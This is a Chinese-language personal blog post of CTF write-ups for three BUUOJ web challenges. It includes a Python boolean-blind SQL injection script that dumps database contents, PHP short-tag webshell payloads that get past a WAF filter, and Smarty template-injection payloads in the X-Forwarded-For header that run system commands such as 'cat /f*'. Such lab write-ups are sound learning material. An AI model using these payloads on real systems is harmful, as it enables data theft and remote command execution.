Err0r233


Err0r233的个人博客

Buuoj题目(4)

  • ~11.29K 字
  • 次阅读

做做buuoj上的web题,本萌新纯采集,轻喷(((

[WUSTCTF2020]颜值成绩查询

熟悉的查询框,输入数字查询成绩

尝试输入1’,显示学生不存在

所以普通的注入失败

尝试使用1^1,发现不存在

1^0发现是admin

所以使用布尔盲注即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import requests
import time
import sys#头文件

url="http://3fc79411-07ae-4931-9f8b-1fb09f15c605.node4.buuoj.cn:81/?stunum="

res="" #结果
for i in range(1,1000): #循环
        left=32
        right=128
        mid=(left + right) //2  #二分中值
        while (left < right):
                #payload = url+"1^(ascii(substr(database(),%d,1))<%d)#"%(i,mid)#爆库
                #payload = url+"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)#"%(i,mid)#爆表
                #payload = url+"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))<%d)#"%(i,mid)#爆列
                payload = url+"1^(ascii(substr((select(group_concat(value))from(flag)),%d,1))<%d)#"%(i,mid) #爆字段,第一个%d传入i 第二个%d传入mid值,数据库的ascii与mid两个作比较,如果一直< 一直循环
                #payload = url+"1^(ascii(substr((select(reverse(group_concat(flag)))from(flag)),%d,1))<%d)#"%(i,mid) #爆字段,第一个%d传入i 第二个%d传入mid值,数据库的ascii与mid两个作比较,如果一直< 一直循环
                html = requests.get(payload)
                print(payload)
                time.sleep(0.04)
                if "exists" in html.text: #这里写入的传参值是< 返回的是ERROR才是对的反应
                        right = mid #如果有延时,右值取中值,再用左+右/2的新区间值与ascii比较(例如,第一次是ascii与80,如果小于80 用ascii与32+80/2=56比较)
                else:
                        left = mid + 1  #如果没有,左值取中值+1,取(81,132)中值比较,ascii值比mid值要大
                mid = (left + right) // 2 #重复上述过程

        if mid <=32 or mid >=127:
                break #防止超出ascii码值
        res += chr(mid-1) #小于号,值要-1
        print(res) #打印
#print("Final Result:",res)

[红明谷CTF 2021]write shell

源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}
#检测写入的语句是否匹配到上面的表达式,如果匹配,返回hacker

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
#创建一个沙箱,如果$dir不存在,创建一个目录
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;//action=pwd时,显示这个目录
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}//action=upload时,将data写入目录的index.php中,如果没有data参数,则将data设定为空,并且data需要经过waf检测
?>

那这里就很简单了,将我们的shell写进$dir内即可

那要怎么写呢?这里过滤了空格、单引号、下划线、php、分号、波浪号、大括号、eval、+、^

PHP短标签

在之前的webshell里讲过,<?=``?> 相当于命令执行

其中的<?= 相当于echo

所以可以直接这样写:

1
<?=`ls`?>

或者是

1
<?echo%09system("ls")?>

然后按命令执行做就可以了,空格用%09替换,单引号用双引号替换,然后访问沙箱路径即可获得回显

[CISCN2019 华东南赛区]Web11

Very水的一个题,感觉不如攻防世界的smarty…

页面显示的是IP Address API

并且写道Build with Smarty

可以推测应该是smarty的xff注入,直接打开burp抓包,修改xff测试:

Request包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
GET / HTTP/1.1
Host: node4.buuoj.cn:28697
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: {1+1}
X-Forwarded: {1+1}
Forwarded-For: {1+1}
Forwarded: {1+1}
X-Requested-With: {1+1}
X-Forwarded-Proto: {1+1}
X-Forwarded-Host: {1+1}
X-remote-IP: {1+1}
X-remote-addr: {1+1}
True-Client-IP: {1+1}
X-Client-IP: {1+1}
Client-IP: {1+1}
X-Real-IP: {1+1}
Ali-CDN-Real-IP: {1+1}
Cdn-Src-Ip: {1+1}
Cdn-Real-Ip: {1+1}
CF-Connecting-IP: {1+1}
X-Cluster-Client-IP: {1+1}
WL-Proxy-Client-IP: {1+1}
Proxy-Client-IP: {1+1}
Fastly-Client-Ip: {1+1}
True-Client-Ip: {1+1}
X-Originating-IP: {1+1}
X-Host: {1+1}
X-Custom-IP-Authorization: {1+1}
Content-Length: 2

Respond包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 15:32:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.3.5
Content-Length: 3905

<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>A Simple IP Address API</title>
    <link rel="stylesheet" href="./css/bootstrap.min.css">
</head>
<body>
<div class="container">
    <div class="row">
        <div style="float:left;">
            <h1>IP</h1>
            <h2 class="hidden-xs hidden-sm">A Simple Public IP Address API</h2>
        </div>
		<div style="float:right;margin-top:30px;">Current IP:2		</div>
<!-- 可以看到这里的current IP:2-->
    </div>

    <div class="why row">
        <div class="col-xs-12">
            <h2>Why use?</h2>
            <div class="row">
                <div class="col-xs-offset-1 col-xs-10">
                    <p>
                        Do you need to get the public IP address ? Do you have the requirements to obtain the servers’ public IP address? Whatever the reason,sometimes a public IP address API are useful.
                    </p>
                    <p>
                        You should use this because:
                    </p><ul>
                    <li>You can initiate requests without any limit.</li>
                    
                    <li>Does not record the visitor information.</li>
                    
                    </ul>
                    <p></p>
                </div>
            </div>
        </div>
    </div>
    <div class="api row">
        <div class="col-xs-12">
            <h2>API Usage</h2>
            <div class="row">
                <div class="col-xs-offset-1 col-xs-11">
                    
                    <div class="table-responsive">
                        <table class="table table-striped table-bordered table-hover">
                            <thead>
                            <tr>
                                <td>-</td>
                                <td>API URI</td>
                                <td width="50px">Type</td>
                                <td>Sample Output</td>
                            </tr>
                            </thead>
                            <tbody>
                            <tr>
                                <td>get IP</td>
                                <td><code>http://node4.buuoj.cn:28697/api</code></td>
                                <td><code>text/html</code></td>
                                <td><code>8.8.8.8</code></td>
                            </tr>
                            <tr>
                                <td>get XFF(X-Forwarded-For)</td>
                                <td><code>http://node4.buuoj.cn:28697/xff</code></td>
                                <td><code>text/html</code></td>
                                <td><code>8.8.8.8</code></td>
                            </tr>
                            
                            
                            </tbody>
                        </table>
                    </div>

                    
                </div>
            </div>
        </div>
    </div>
    <div class="examples row">
        
    </div>

    <div class="row">
        <div class="col-xs-12">
            <h2 style="margin-bottom:0;">Connection</h2>
            <div class="row">
                <div class="col-xs-offset-1 col-xs-10">
                    <h3>Request-Header</h3>
                    <pre>GET / HTTP/2.0
Host: www.ip.la
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8
Cache-Control: max-age=0
Dnt: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36

</pre>
                </div>
            </div>
        </div>
    </div>
    <footer>
        <p style="text-align:center;font-size:14px;">Build With Smarty !</p>
    </footer>
</div>

</body></html>

可以发现执行了加法运算

将xff修改:X-Forwarded-For: {system(‘ls /’)}

Request包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET / HTTP/1.1
Host: node4.buuoj.cn:28697
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: {system('ls /')}
Content-Length: 4




Response包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<div style="float:right;margin-top:30px;">Current IP:bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
usr
var
var		</div>
    </div>

可以看到成功了,直接读flag即可

X-Forwarded-For: {system(‘cat /f*’)}

1
2
3
response包:
<div style="float:right;margin-top:30px;">Current IP:<?php $flag="flag{b9aaeb9b-a5d7-4908-bd35-f6b4763c1ac4}";
<?php $flag="flag{b9aaeb9b-a5d7-4908-bd35-f6b4763c1ac4}";		</div>
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可